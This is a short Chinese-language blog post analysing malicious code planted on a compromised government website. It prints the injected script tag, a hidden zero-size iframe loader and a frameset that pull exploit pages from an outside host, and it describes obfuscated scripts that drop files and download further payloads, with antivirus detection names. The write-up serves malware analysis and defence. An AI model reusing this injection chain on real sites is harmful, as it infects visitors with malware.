某政府网站被加入的自动下载病毒文件的代码再创新花样（第1版）

endurer　原创

2006.01.23　第1版

今天浏览前几天说的那个被加入恶意代码的政府网站（详见： 某政府网站被加入的自动下载病毒文件的代码变了花样（第1版） ），又发现了新花样。

政府网站首页加入的代码为：

 

 

＜script language="JavaScript" src="hxxp://www.***snqc.cn/images/mail.js"＞＜/script＞

 

 

mail.js的内容为：

 

 

document.write("＜iframe src=hxxp://www.***snqc.cn/images/error.htm width=0 height=0＞＜/iframe＞");

 

 

error.htm的内容为：

＜frameset rows="444,0" cols="*"＞
＜frame src="hxxp://help.3721.com/error.html" framborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0"＞
＜frame src="top.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0"＞
＜frame src="gif.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0"＞
＜frame src="hxxp://help.3721.com/error.html" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0"＞
＜/frameset＞
  

 

top.htm 瑞星报为：Exploit.VBS.Phel.z，江民KV报为：Exploit.VBS.Phel.ab，Kaspersky报为：Exploit.VBS.Phel.be。

gif.htm 瑞星报为：Exploit.HTML.Mht，江民KV不报，Kaspersky报为：Exploit.HTML.Mht。

top.htm的内容是用escape()加密的脚本。此脚本会尝试生成文件c:/WINDOWS/Help/apps.chm，自动下载：hxxp://www.***snqc.cn/images/tzd.js。

tzd.js的内容也是用escape()加密的脚本，其中部分代码使用escape()加密了两次。此脚本会尝试生成文件C:/AUTOEXEC.COM，c:/NTDETECT.hta。

tzd.js：瑞星和江民KV报为Exploit.VBS.Phel，Kaspersky报为：Exploit.VBS.Phel.bq。